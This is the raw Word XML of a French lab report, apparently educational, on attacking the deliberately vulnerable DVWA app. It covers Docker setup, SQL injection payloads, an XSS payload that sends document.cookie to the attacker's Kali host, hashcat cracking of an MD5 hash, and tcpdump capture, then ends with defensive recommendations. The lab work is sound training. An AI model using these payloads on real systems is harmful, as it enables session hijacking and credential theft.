    <w:p w14:paraId="357E84E6" w14:textId="46AA06B6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51BD2B9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Attaque 2 :</w:t>
      </w:r>
      <w:r w:rsidRPr="008F1386">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"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Exploitation Web (DVWA – SQL Injection, XSS, bruteforce)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613F31D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6.1 Objectif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50684FC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Montrer un chemin d’attaque typique sur une application Web vulnérable :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC9B8D2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Déploiement de DVWA via Docker sur Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C43238" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Accès à DVWA depuis le client Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC777B2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Exploitation de SQL Injection pour extraire des données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1547AA21" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Exploitation de XSS pour montrer un vol potentiel de cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79566BE2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Récupération de hash de mots de passe et tentative de craquage avec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0375AA47" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 xml:space="preserve">Capture du trafic HTTP avec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tcpdump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54120BE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6.2 Déploiement DVWA avec Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536094C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Sur Kali (interface NAT configurée) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B37B48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cd ~/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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6314DDD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sudo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docker-compose up -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d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="328FF35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docker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ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5777808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Résultat attendu :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8AF47E" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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conteneur dvwa_db_1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MariaDB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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D24EC1" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 conteneur dvwa_dvwa_1 exposé sur 0.0.0.0:8081-&gt;80/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tcp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71D876B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Vérification locale :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850440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curl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-I http://127.0.0.1:8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4F3EE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 client Windows accède ensuite à DVWA via :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  <w:t>http://IP_KALI:8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30822064" w14:textId="1D85A3E2" w:rsidR="00E20787" w:rsidRDefault="00E2078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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AECCDD3" wp14:editId="070C9F5B">
            <wp:extent cx="5486400" cy="5436235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1178323900" name="Image 7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23900" name="Image 7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75B7" w14:textId="39A60106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6.3 Configuration DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B8CCC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Dans l’interface :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03953D06" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Login par défaut : admin /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password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497E7094" w14:textId="34254EE9" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Passer la sécurité en “Low” pour activer les vulnérabilités.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1C81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6.4 Scénario SQL Injection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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955EA8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6.4.1 Principe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0013248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DVWA propose une page “SQL Injection” où un paramètre (ex : id) est directement injecté dans une requête SQL sans filtrage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796CD63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6.4.2 Étapes d’exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F63A66B" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Depuis le client Windows, aller dans le menu SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF450A2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Tester une valeur normale : 1 → l’application renvoie un utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C610B3" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Injecter un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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B5F3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Exemple :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FFD58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1' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAFB07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ou</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B120BA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' OR 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E556BD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Résultat : la page renvoie plus de lignes que prévu → vulnérabilité confirmée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0ADFE8" w14:textId="5F54B295" w:rsidR="00E20787" w:rsidRDefault="00E2078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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F53E920" wp14:editId="63CEC33B">
            <wp:extent cx="6119446" cy="5019675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="806416698" name="Image 8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16698" name="Image 8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4188" cy="50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6762" w14:textId="77777777" w:rsidR="00E20787" w:rsidRDefault="00E20787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20963CB5" w14:textId="0E24A3ED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6.4.3 Extraction d’informations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA3B9D4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Avec des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plus avancés, il serait possible de :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1CDE32" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Enumérer les noms de tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3084F862" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Extraire la table des utilisateurs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username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, hash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7839A7BB" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Récupérer les hash de mots de passe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E4B2D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Dans le cadre du labo, l’accent est mis sur :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAE7A90" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Le concept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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A0BB95" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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La démonstration visuelle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4911BA" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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La récupération de hash de mots de passe depuis l’interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3139FB2A" w14:textId="66D7DB7D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186557FF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en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en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6.5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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en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Scénario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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en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XSS (Cross-Site Scripting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED8E0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6.5.1 Principe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E8BD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 propose une page vulnérable à XSS stocké ou réfléchi.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  <w:t>Un script injecté par un attaquant est renvoyé au navigateur d’un autre utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6B2A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6.5.2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utilisé</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102FDC6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Exemple de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simple :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17261B74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&lt;script&gt;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alert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('XSS');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF7FD0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Exemple de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orienté vol de cookie :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B368E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&lt;script&gt;document.location='http://IP_KALI/cookie?c='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CC8B48" w14:textId="4B887C19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Dans le labo, l’alerte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alert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('XSS') montrer</w:t>
      </w:r>
      <w:r w:rsidR="00E14E39">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>a</w:t>
      </w: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l’exécution de JavaScript côté client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6643C82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6.5.3 Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51619685" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Possibilité de voler des cookies de session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D841D0" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Usurpation de session (si le cookie n’est pas protégé).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E532C9E" w14:textId="03927BE7" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Injection d’autres scripts malveillants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E3AEA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6.6 Bruteforce et analyse de hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AEE21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6.6.1 Récupération des hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424DF3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À partir de la base DVWA (ou de l’interface admin), on peut récupérer un hash de mot de passe, par exemple :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1593ACF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5f4dcc3b5aa765d61d8327deb882cf99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5FB98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(qui correspond à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password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en MD5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E420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6.6.2 Préparation du fichier de hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0718887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Sur Kali :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53375F3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echo -n "5f4dcc3b5aa765d61d8327deb882cf99" &gt; hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4BDC94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6.6.3 Installation de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</w:p>
    <w:p w14:paraId="0F59E45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sudo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apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698ED5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sudo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apt install -y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</w:p>
    <w:p w14:paraId="33D6DEE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--version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55312C4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6.6.4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Wordlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A7BEDF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Comme rockyou.txt n’était pas présent et difficile à télécharger, on peut :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F64FE96" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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soit créer une petite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wordlist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maison,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4087A2E0" w14:textId="31EC7C02" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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soit récupérer une liste depuis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SecLists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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8031CF" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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soit démontrer la commande sans utiliser toute la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wordlist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réelle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0703A22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Exemple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minimal :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31705E6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echo "password" &gt; smalllist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE1692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echo "admin123" &gt;&gt; smalllist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C0D0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echo "test123" &gt;&gt; smalllist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDCBC2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6.6.5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Lancement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de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</w:p>
    <w:p w14:paraId="322B129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-m 0 -a 0 hash.txt smalllist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3975E0D6" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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-m 0 : hash MD5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3F3660" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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-a 0 : attaque par dictionnaire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B33821" w14:textId="754FE820" w:rsidR="00E14E39" w:rsidRDefault="00E14E39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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1588FBB4" wp14:editId="58E5BEC6">
            <wp:extent cx="5486400" cy="5144135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1068443686" name="Image 9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3686" name="Image 9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3FF" w14:textId="648F2CB6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6.7 Capture du trafic avec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tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35024AF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Pour enregistrer les échanges HTTP entre le client et DVWA :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3402735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Sur Kali :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D10B93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mkdir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-p ~/captures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659F15B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sudo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tcpdump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-i ens33 host IP_CLIENT and port 8081 -w ~/captures/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dvwa_demo.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23106B3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 xml:space="preserve"># Lancer ensuite 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la</w:t>
      </w:r>
      <w:proofErr w:type="gram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navigation/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/XSS depuis le client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EEDCA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# Puis arrêter avec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Ctrl+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76D48149" w14:textId="6D2FAAE8" w:rsidR="00E14E39" w:rsidRDefault="00E14E39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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58BC8343" wp14:editId="7EC1B141">
            <wp:extent cx="5486400" cy="5707380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1117278270" name="Image 10" descr="Une image contenant Appareils électroniques,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8270" name="Image 10" descr="Une image contenant Appareils électroniques, texte, capture d’écran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BE6E" w14:textId="56F74F99" w:rsidR="00E14E39" w:rsidRPr="00A80471" w:rsidRDefault="00E14E39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>NB</w:t>
      </w:r>
      <w:r w:rsidR="00A80471">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00A80471" w:rsidRPr="00A80471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L’expression « dans un autre terminal » signifie que certaines commandes doivent être exécutées en parallèle. Par exemple, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A80471" w:rsidRPr="00A80471">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A80471" w:rsidRPr="00A80471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doit capturer le trafic dans une première fenêtre, pendant que l’utilisateur effectue les actions Web dans une autre fenêtre.</w:t>
      </w:r>
      <w:r w:rsidR="00A80471" w:rsidRPr="00A80471">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>Cela permet de capturer en temps réel les requêtes HTTP générées par l’attaque.</w:t>
      </w:r>
      <w:r w:rsidR="00A80471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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529006B" w14:textId="00D497E9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Le fichier .pcap peut ensuite être ouvert dans Wireshark pour :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7101FB95" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Voir les requêtes HTTP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741D86DA" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Retrouver le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ou XSS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB3FA0" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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Observer les cookies et réponses du serveur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F549C4A" w14:textId="656CFA3D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5BFCA171" w14:textId="71F5A0CF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6.8 Schéma d’attaque Web </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CA4EB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Chemin d’attaque 2 – DVWA /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/ XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3B3E3D" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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[Client Windows] → HTTP → [DVWA sur Kali:8081]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CF8FFD" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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 construit une requête SQL vulnérable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D3B0FB" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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L’attaquant injecte un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payload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(' OR 1=1 --).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59395F61" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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 serveur renvoie des données supplémentaires (utilisateurs, hash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090CF00C" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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L’attaquant récupère les hash → [Kali /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] → bruteforce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5061ADBD" w14:textId="77777777" w:rsidR="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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 parallèle, via XSS, il peut exécuter du JS dans le navigateur du client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3411EF52" w14:textId="1DE69CD6" w:rsidR="00A35481" w:rsidRPr="008F1386" w:rsidRDefault="00A35481" w:rsidP="00A35481">
      <w:pPr>
        <w:ind w:left="720"/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val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="331B8500" wp14:editId="56EE40CD">
            <wp:extent cx="5710205" cy="3430905"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1379124469" name="Image 1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4469" name="Image 1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3039" cy="343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FA09" w14:textId="0F0A9392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</w:p>
    <w:p w14:paraId="604F04F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Discussion et limites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527E151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7.1 Discussion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FC6814" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Le labo montre deux vecteurs d’attaque complémentaires :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733194BD" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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 → niveau réseau/interne, exfiltration de fichiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50240FD2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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 → niveau applicatif Web, compromission logique de la base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127FBA31" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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On voit clairement que :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4916A78B" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Une simple mauvaise configuration SMB + mot de passe faible suffit pour perdre des fichiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05264CC0" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Une simple absence de validation d’entrées Web suffit pour exposer la base.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B1FA4" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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L’attaque DVWA illustre aussi la chaîne :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D9B1C5" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40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SQLi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→ accès aux données → hash → bruteforce → récupération du mot de passe en clair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65858837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7.2 Limites du labo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC781EB" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Environnement réduit, sans vraie supervision :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CFE957" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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 de SIEM, pas d’EDR, pas de SOC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013787B3" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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DVWA est volontairement vulnérable : ce n’est pas une application de production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278B57B" w14:textId="69D5447A" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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 d’exploitation AD avancée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Kerberoasting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DCSync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, etc.), uniquement SMB et quelques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cmdlets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AD possibles côté Blue Team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD6DF4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Recommandations de sécurité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3FF44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8.1 Pour SMB et l’infrastructure Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098BC1D5" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Appliquer une politique de mot de passe forte :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197C106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Longueur minimale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D4E94F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Complexité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14074548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Liste de mots interdits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password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, 123456, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F99CDE" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Durcir SMB :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0403D5F5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Désactiver SMBv1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2233BB4C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Limiter les partages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A51B4A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Appliquer le principe du moindre privilège.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A14C711" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Surveiller :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A25A135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Connexions SMB inhabituelles.</w:t>
      </w:r>
    </w:p>
